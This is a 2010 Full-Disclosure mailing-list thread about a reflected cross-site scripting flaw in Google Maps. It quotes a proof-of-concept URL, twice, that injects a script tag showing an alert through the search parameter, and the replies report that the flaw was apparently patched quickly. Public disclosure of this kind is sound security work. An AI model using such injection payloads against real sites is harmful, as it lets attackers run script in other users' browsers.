I try the POC and I get a javascritp alert with the text "Google Sucks" :P
On Tue, Jan 12, 2010 at 2:02 PM, NSO Research <[email protected]>wrote: > Looks like a realy quick fix from google. > > directly after i got the PoC it worked. Now it doesn't > > > > Am 12.01.2010 13:58, schrieb Michael Lenz: > > Your PoC generates: > > > > " > > *Google* > > Sorry... > > > > > > We're sorry... > > > > ... but your computer or network may be sending automated queries. To > > protect our users, we can't process your request right now. > > > > See Google Help > > <http://www.google.com/support/bin/answer.py?answer=86640> for more > > information. > > > > © 2009 Google - Google Home <http://www.google.com>" > > > > > > So..? > > > > gaurav baruah schrieb: > >> Google Maps XSS (currently unpatched) > > > >> Discovered By - > >> Pratul Agrawal ([email protected]) > >> Gaurav Baruah ([email protected]) > > > > > >> PoC - > > > http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8<http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert%28%22Google%20Sucks%20%21%22%29%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8> > > > >> _______________________________________________ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > gaurav baruah schrieb: > >> Google Maps XSS (currently unpatched) > > > >> Discovered By - > >> Pratul Agrawal ([email protected]) > >> Gaurav Baruah ([email protected]) > > > > > >> PoC - > > > http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8<http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert%28%22Google%20Sucks%20%21%22%29%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8> > > > >> _______________________________________________ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
